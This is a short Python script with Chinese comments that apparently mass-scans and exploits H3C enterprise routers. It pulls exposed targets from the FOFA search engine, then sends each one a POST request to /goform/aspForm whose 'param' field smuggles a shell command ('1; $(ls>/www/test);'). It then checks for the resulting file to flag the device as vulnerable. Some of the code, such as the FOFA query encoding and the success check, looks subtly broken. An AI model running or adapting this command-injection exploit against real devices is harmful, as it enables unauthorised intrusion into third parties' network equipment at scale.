import requests# 设置 FOFA API Key 和查询语句FOFA_EMAIL = "[email protected]"FOFA_KEY = "your_fofa_api_key"QUERY = 'app="H3C-Ent-Router"'# 使用 FOFA 获取目标资产列表def get_targets():    url = "https://fofa.info/api/v1/search/all"    params = {"qbase64": FOFA_KEY.encode("utf-8").hex() + "=" + QUERY.encode("utf-8").hex(),              "email": FOFA_EMAIL }    response = requests.get(url, params=params)    if response.status_code == 200:        results = response.json()        return [result[0] for result in results["results"]]    else:        raise Exception("Failed to retrieve targets from FOFA")# 构造并发送包含 pop 参数的 POST 请求def send_request(target_url):    url = target_url + "/goform/aspForm"    headers = {"Accept-Encoding": "gzip, deflate",               "Content-Type": "application/x-www-form-urlencoded",               "Referer": target_url + "/userLogin.asp",               "Accept-Encoding": "gzip"}    data = {"CMD": "DelL2tpLNSList", "GO": "vpn_l2tp_session.asp", "param": "1; $(ls>/www/test);" }    response = requests.post(url, headers=headers, data=data, allow_redirects=False)    if response.status_code == 302:        url = target_url + "/test"        kali = requests.get(url,verify=False)        if kali.text == "var":            print(f"[+] Target {target_url} is vulnerable!")    else:        print(f"[-] Target {target_url} is not vulnerable.")# 获取目标资产列表，并逐个发送请求targets = get_targets()for target in targets:    try:        send_request(target)    except Exception as ex:        print(f"[-] Failed to test target {target}: {ex}")